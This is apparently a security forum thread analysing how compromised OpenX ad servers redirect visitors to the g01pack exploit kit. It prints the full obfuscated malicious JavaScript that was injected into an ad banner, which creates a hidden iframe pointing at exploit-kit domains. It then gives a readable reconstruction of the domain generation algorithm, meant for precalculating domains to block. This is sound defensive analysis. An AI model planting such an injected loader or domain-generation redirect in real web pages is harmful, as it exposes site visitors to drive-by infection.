Precalculating Dyndns domain names of g01pack exploit kit

[SysAdMini]

If you follow us on Twitter, you have probably seen our tweets about compromised OpenX servers leading to g01pack exploit kit. 

g01pack has been using  a signed Java applet for a few days. Eric Romang published an article about it.

I  see compromised OpenX servers leading to g01pack daily. Added Javascript code creates an iframe leading to a DynDNS domain.
Domain names change frequently.

Code on compromised OpenX servers is heavily obfuscated. Here is an example :

Code: [Select]

var OX_e092ce8f = '';
OX_e092ce8f += "<"+"script type=\'text/javascript\'>var _C;if(_C!=\"B_F\"){_C=\"B_F\"};var NE=\"MS\";this.YM=\"YM\";DC=[\"WKH\",\"QV\"];IMF=[\"BD\",\"nOZ\",\"x$\"];var N$=\"PX\";this.SQ=\"SQ\";lVA=[];var IK$ATY;var qD;if(qD!=\"\"&&qD!=\"WM\"){qD=null};var lK;if(lK!=\"\"&&lK!=\"GL\"){lK=null};IK$ATY=function(){function n(){q=_(\'q\');Y=h(W(\"4&Bm\"));T=new Y();T=T[q]();b=u(664653,1000);b=t(T,b);return b;};function yF(nP,nZ,sO){rI=RH();tG=K(MT,rI);$S=_(\'$S\');JOC=_(\'JOC\');xA=_(\'xA\');IS=_(\'IS\');xG=_(\'xG\');sB=_(\'sB\');JJ=_(\'JJ\');hY=_(\'hY\');iG=_(\'iG\');HUG=l[$S];Y=h(W(\"4&Bm\"));sO=new Y(sO);sO=sO[iG]();ZG=K(nP,JOC,nZ,JJ,sO,hY,xG,sB,tG);l[$S]=ZG;};function S$(gY,NV){Y=h(W(\"4&Bm\"));DY=_(\'DY\');IS=_(\'IS\');g=1;TJ=5;zT=new Y();tG=_(\'mD\');UV=W(\"&(CWrC(iC(ummQCr}C6CirC*mCQ&C&C}CaCB61CB}CrC-Ca&ppCW(CU-1CZCtC}pQCYC?C-}UC6iCiCrmBCBCt}CBWC-}(BC}rC&QCu}6B&pCr&C}6Qm6C%C&(tCpC(CQCu}Ca&BC5}6C*C}55C}UrCmC5CuCpmCi(\");UV=UV[DY](IS);zI=_(\'zI\');hG=t(zI,_(\'DD\'));DT=t(zI,_(\'lT\'));LI=t(zI,_(\'ZI\'));mE=t(zI,_(\'HU\'));OG=uP(zT[hG]());fG=zT[DT]();tM=zT[LI]();yN=zT[mE]();PT=fT(gY,OG);RV=fT(NV,OG);JS=U(UV);JH=OG;dY=K(OG,fG);YS=K(OG,fG,tM);NO=K(OG,fG,tM,yN);o=aB(JH,JS);J=aB(dY,JS);KH=aB(YS,JS);VY=aB(NO,JS);J=gM(J,o,g,JS);KH=gM(KH,J,g,JS);VY=gM(VY,KH,g,JS);tG=t(tG,PT);tG=t(tG,YX(UV,o));tG=t(tG,YX(UV,J));tG=t(tG,YX(UV,KH));tG=t(tG,YX(UV,VY));;tG=t(tG,RV);return tG;};function RH(){qR=_(\'qR\');BE=_(\'BE\');DY=_(\'DY\');MT=_(\'MT\');g=1;EIS=2;Z=m();rI=l[BE][qR];rI=rI[DY](MT);OY=U(rI);JH=fO(OY,g);dY=fO(OY,EIS);pV=Z;pV=K(rI[dY],MT,rI[JH]);return pV;};function oT(){IY=this;return IY;};function fT(BY,OG){dR=_(\'mD\');try{pL=U(BY);BIY=aB(OG,pL);dR=BY[BIY];}catch(IE){}return dR;};function W(y){Z=m();if(y==Z)return y;H=\'WIl*1C46rkzp\'+v(\'boS5>KXw<"+"N_qu]BboS\',3,12)+v(\'3 bQ,$h%FmnVHvRx\',0,12)+\'Od[oGav.UexE\'+v(\'Y^-=)L}JcfTtANF\',0,12)+v(\'/:&jiHZRyP|A8T2\',0,12)+v(\'{7;2gsMD0?(#o5V\',0,12)+\'S89\';j=v(\'uW%my DrnL?l9NTv\',0,12)+v(\'ry9nf2C-RP[vMpKtny9r\',4,12)+v(\':Z=dQ|Vb)e}8xRXu\',0,12)+v(\'HYXA5SI]$c>6wU4GAHXY\',4,12)+\'j*hEJ7o#Xx0k\'+v(\'sKwM^1aziAq/OBY<"+"KMsw\',4,12)+v(\'8kO(&{,3HFNTgs9O8k\',3,12)+\'_;.\';F=\'indexOf\';k=\'subst\'+v(\'r6MDe\',0,1);E=0;g=1;x=Z;for(A=E;A<"+"U(y);A++){o=y[k](A,g);z=H[F](o);if(z>-1){J=j[k](z,g);x=t(x,J);}}return x;};function u(ZZ,gZ){pV=ZZ*gZ;return pV;};function oS(){SB=h(W(\"r&_i?&B}6\"));IG=h(W(\"HaBi_mcy%YmaB\"));YY=h(W(\"cqksBBuwmZWm(B\"));SG=c(W(\"{M56m5}f$K-6}*m$kirWf$q&aCydF\"),m());WU=_(\'WU\');i=_(\'i\');dS=_(W(\"Qd\"));GB=SB[dS];pV=(typeof IG!=WU||typeof YY!=WU)&&!SG[i](GB);return pV;};function L(){WW=oT();HK=_(\'HK\');return WW[HK];};function _(VD){var GA={vY:W(\"wm?=fu\"),HK:W(\"Q}aW*mrB\"),mD:m(),WU:W(\"WrQm5irmQ\"),i:W(\"Bm(B\"),dS:W(\"W(m6H?mrB\"),vWU:W(\"*&Ba-\"),$S:W(\"a}}tim\"),hQ:W(\"(6a\"),jG:W(\"-BBu3RR\"),zI:W(\"?mBe0K\"),DD:W(\"s}W6(\"),lT:W(\"4&Bm\"),ZI:W(\"q}rB-\"),HU:W(\"MWpp|m&6\"),iG:W(\"B}Eq0dB6ir?\"),q:W(\"?mB0i*m\"),lU:W(\"A%}Q1v\"),iN:W(\"i56&*m\"),HV:W(\"u}(iBi}r\"),eH:W(\"&%(}pWBm\"),iA:W(\"B}u\"),wL:W(\"pm5B\"),mF:W(\"RrmU(R\"),F:W(\"irQmfy5\"),OOS:W(\"6mup&am\"),k:W(\"(W%(B6\"),DY:W(\"(upiB\"),xF:W(\"B}k}Um6K&(m\"),rW:W(\"a-&6HB\"),_F:W(\"%}Q1\"),BE:W(\"p}a&Bi}r\"),qR:W(\"-}(B\"),FD:W(\"&uumrQK-ipQ\"),qV:W(\"a6m&Bm=pm*mrB\"),aL:W(\"U6iBm\"),DH:W(\"m_&p\"),XL:W(\"(B1pm\"),oC:W(\"UiQB-\"),$I:W(\"-mi?-B\"),XD:W(\"?mB=pm*mrBP1[Q\"),e$:W(\"iQ\"),YF:W(\"5p}}6\"),kA:W(\"6&rQ}*\"),Q:W(\"&6?W*mrB(\"),JJ:W(\"8Cmfui6m(b\"),hY:W(\"8Cu&B-b\"),sB:W(\"8CQ}*&irb\"),IS:W(\"C\"),aU:\'\\\\\',xG:W(\"R\"),JOC:W(\"b\"),fL:W(\"S\"),MT:W(\"9\"),xA:W(\"8\"),EZ:W(\"2\")};pV=N();LJ=false;for(A in GA){if(A==VD){pV=GA[A];LJ=true;break;}}return pV;};function KMF(D,A){var rW=_(\'rW\');return D[rW](A);};function XW(ZG,nZ){$S=_(\'$S\');F=_(\'F\');JOC=_(\'JOC\');kI=-1;HUG=l[$S];pV=false;if(U(HUG)>0){DX=K(ZG,JOC,nZ);pV=HUG[F](DX)!=kI;}return pV;};function X(){V=\'f\';if(h(\'e\')==V){return false;}d(\'e\',V);try{l=L();I=$();if(S(I)){return false;}if(B()){return false;}var r=O();P=m();C=1;pD=WV();gY=r.gY;NV=r.NV;gK=XW(pD,C);if(!gK){oS=oS();if(oS){tG=S$(gY,NV);JM=pW();eO=_(\'hQ\');nN=_(\'jG\');ZF=_(\'mF\');P=K(nN,tG,ZF);JM[eO]=P;jC=n();yF(pD,C,jC);};};}catch(IE){};};function c(bP,JZ){TV=h(W(\"wm?=fu\"));aU=\'\\\\\';bP=ZY(bP,W(\"SSdkHdsSS\"),aU);IY=new TV(bP,JZ);return IY;};function O(){return{gY:YN(W(\"\")),NV:YN(W(\"9Q}m(rBmfi(B9a}*29Qr(&pi&(9a}*29Q1r&pi&(9a}*\")),RB:YN(W(\"(:\"))};};function S(I){XD=_(\'XD\');uQ=l[XD](I);return uQ;};function N(){return null;};function fO(ZZ,gZ){pV=ZZ-gZ;return pV;};function h(IB){WW=oT();IY=WW[IB];return IY;};X();function WV(){Z=m();BE=_(\'BE\');qR=_(\'qR\');OOS=_(\'OOS\');QM=c(W(\"N/&XjTX#So\"),W(\"?i\"));mF=_(\'mF\');fL=_(\'fL\');rI=l[BE][qR];$N=RH();$N=K($N,fL,mF);$N=$N[OOS](QM,Z);return $N;};function ZY(y,DX,QU){F=\'inde\'+v(\'xOf0C8r\',0,3);OOS=v(\'replaceTIo\',0,7);while(y[F](DX)>=0)y=y[OOS](DX,QU);return y;};function aB(ZZ,gZ){pV=ZZ%gZ;return pV;};function U(D){return D.length;};function uP(D){SI=h(W(\"q&B-\"));YF=_(\'YF\');return SI[YF](D);};function YN(D){var DY=_(\'DY\');var OZ=_(\'EZ\');return D[DY](OZ);};function QS(){SI=h(W(\"q&B-\"));kA=_(\'kA\');return SI[kA]();};function YX(OD,A){return OD[A];};var l=N();function gM(UG,RL,gM,JR){if(UG==RL){UG=t(UG,gM);UG=aB(UG,JR);}return UG;};function K(){Q=_(\'Q\');w=K[Q];E=0;M=w[E];if(typeof(M)==W(\"rW*%m6\"))x=E;else x=m();for(var A=E;A<"+"U(w);A++)x=t(x,w[A]);return x;};function pW(){qV=_(\'qV\');FD=_(\'FD\');iN=_(\'iN\');HV=_(\'HV\');eH=_(\'eH\');_F=_(\'_F\');lU=_(\'lU\');aL=_(\'aL\');oC=_(\'oC\');$I=_(\'$I\');iA=_(\'iA\');wL=_(\'wL\');XL=_(\'XL\');e$=_(\'e$\');I=$();uQ=l[qV](iN);uQ[e$]=I;wX=W(\":>Tuf\");hDD=W(\"X>T:uf\");uQ[XL][oC]=wX;uQ[XL][$I]=wX;uQ[XL][iA]=hDD;uQ[XL][wL]=hDD;uQ[XL][HV]=eH;try{l[_F][FD](uQ);}catch(IE){try{l[aL](lU);l[_F][FD](uQ);}catch(zO){};};return uQ;};function d(IB,nZ){WW=oT();WW[IB]=nZ;};function t(D,HY){pV=D+HY;return pV;};function B(){s=c(W(\"SSdkHdsSSFSSdkHdsSS(^SSdkHdsSS;SSdkHdsSS(^SSdkHdsSSNSSdkHdsSS(^r&Bi_mSSdkHdsSS(^a}QmSSdkHdsSS(^SSdkHdsSSoSSdkHdsSS(^SSdkHdsSSnSSdkHdsSS(^G\"),W(\"?i\"));i=_(\'i\');G=h(W(\"m_&p\"));a=!s[i](G);x=false;R=true;if(a)x=R;return x;};function $(){I=K(\'iZ\',\'NA\',\'UB\');return I;};function v(D,A,p){return D.substr(A,p);};function m(){return\'\';};};this.vB=\"\";this.DZ=3900;this.DZ++;var JKH={iGW:false};LZ=63678;LZ+=71;IK$ATY();<"+"/script><"+"SCRIPT LANGUAGE=\"JavaScript\">\n";
OX_e092ce8f += "<"+"!-- Hide from old browsers\n";
OX_e092ce8f += "// Modify to reflect site specifics\n";
OX_e092ce8f += "adserver = \"http://ads.quartermedia.de/quartermedia\";\n";
OX_e092ce8f += "target = \"/site=HANDYMC.DE/area=CT_HANDYMC_WALLPAPER/size=728x90\";\n";
OX_e092ce8f += "// Cache-busting and pageid values\n";
OX_e092ce8f += "random = Math.round(Math.random() * 100000000);\n";
OX_e092ce8f += "if (!pageNum) var pageNum = Math.round(Math.random() * 100000000);\n";
OX_e092ce8f += "document.write(\'<"+"SCR\');\n";
OX_e092ce8f += "document.write(\'IPT SRC=\"\' + adserver + \'/jserver/random=\' + random + target + \"/viewid=\" + pageNum + \'\">\');\n";
OX_e092ce8f += "document.write(\'<"+"/SCR\');\n";
OX_e092ce8f += "document.write(\'IPT>\');\n";
OX_e092ce8f += "// End Hide -->\n";
OX_e092ce8f += "<"+"/SCRIPT><"+"div id=\'beacon_e0670946aa\' style=\'position: absolute; left: 0px; top: 0px; visibility: hidden;\'><"+"img src=\'http://www2.handy-mc.de/www/delivery/lg.php?bannerid=12&amp;campaignid=8&amp;zoneid=1&amp;loc=1&amp;referer=http%3A%2F%2Fwww.handy-mc.de%2F&amp;cb=e0670946aa\' width=\'0\' height=\'0\' alt=\'\' style=\'width: 0px; height: 0px;\' /><"+"/div><"+"script type=\'text/javascript\'>document.context=\'YjoxMnxwOjg=\'; <"+"/script>\n";
document.write(OX_e092ce8f);

if (document.OA_used) document.OA__used += 'bannerid:12,';

if (document.MAX_used) document.MAX_used += 'bannerid:12,';

if (document.phpAds_used) document.phpAds_used += 'bannerid:12,';

I was wondering how it works and checked it in debugger.
Here is conversion of the most important function into readable code.

Code: [Select]

<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<meta http-equiv="language" content="en"/>
<head>
<body>
<script type="text/javascript">
gY=[""];
NV=[".doesntexist.com",".dnsalias.com",".dynalias.com"];
g = 1;
TJ = 5;
zT = new Date();
tG="";
UV="as un si speed no r in me da a o c try to n h call us why q k old j g how ri i net t ko tu host on ad portal na order b ask l s d po cat for m off own e f p le is"
UV=UV.split(" ");
OG=Math.floor(zT.getUTCHours());
fG=zT.getUTCDate();
tM=zT.getUTCMonth();
yN=zT.getUTCFullYear();
PT=gY[OG % gY.length];
RV=NV[OG % NV.length];
JS=UV.length;
JH=OG;
dY=OG+fG;
YS=OG+fG+tM;
NO=OG+fG+tM+yN;
o=JH % JS;
J= dY % JS;
KH=YS % JS;
VY=NO % JS;
if (J == o) {
 J = J + g;
 J = J % JS;
}
if (KH == J) {
 KH = KH + g;
 KH = KH % JS;
}
if (VY == KH) {
 VY = VY + g;
 VY = VY % JS;
}
tG=tG+PT;
tG=tG+UV[o];
tG=tG+UV[J];
tG=tG+UV[KH];
tG=tG+UV[VY];
tG=tG+RV;
document.write("hxxp://"+tG+"/news/");
</script>
</body>

Script calculates the current exploit kit url based on current date and hour. You can save the script as html file and run it in your browser.

It's up to you to add a loop for precalculating a list of all future domain names. Maybe some of you has a good contact at Dyndns and can forward a list to those guys for blocking.
 

[SysAdMini]

Ruby implementation of the g01pack DynDNS domain generation algorithm

https://gist.github.com/jedisct1/5149014

[SysAdMini]

I have found a modified algorithm today.

Url of the compromised OpenX server was :

Code: [Select]

ads.universfreebox.com/www/delivery/afr.php?zoneid=1&cb=INSERT_RANDOM_NUMBER_HERE
There are 2 modifications in the algorithm.

1.) The string list for generation of the domain name has been replaced.
New string list is:
"t speed off q ask why portal un m is po le us order host na p own call as j o old no si h ad e r g to cat n ko how i tu l d in on da b ri f try a k for me net c s"

2.) The folder name has been changed from "/news/ to "/paints/".

Here is a new version of my script.

Code: [Select]

<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<meta http-equiv="language" content="en"/>
<head>
<body>
<script type="text/javascript">
gY=[""];
NV=[".doesntexist.com",".dnsalias.com",".dynalias.com"];
g = 1;
TJ = 5;
zT = new Date();
tG="";
UV="t speed off q ask why portal un m is po le us order host na p own call as j o old no si h ad e r g to cat n ko how i tu l d in on da b ri f try a k for me net c s"
UV=UV.split(" ");
OG=Math.floor(zT.getUTCHours());
fG=zT.getUTCDate();
tM=zT.getUTCMonth();
yN=zT.getUTCFullYear();
PT=gY[OG % gY.length];
RV=NV[OG % NV.length];
JS=UV.length;
JH=OG;
dY=OG+fG;
YS=OG+fG+tM;
NO=OG+fG+tM+yN;
o=JH % JS;
J= dY % JS;
KH=YS % JS;
VY=NO % JS;
if (J == o) {
 J = J + g;
 J = J % JS;
}
if (KH == J) {
 KH = KH + g;
 KH = KH % JS;
}
if (VY == KH) {
 VY = VY + g;
 VY = VY % JS;
}
tG=tG+PT;
tG=tG+UV[o];
tG=tG+UV[J];
tG=tG+UV[KH];
tG=tG+UV[VY];
tG=tG+RV;
document.write("hxxp://"+tG+"/paints/");
</script>
</body>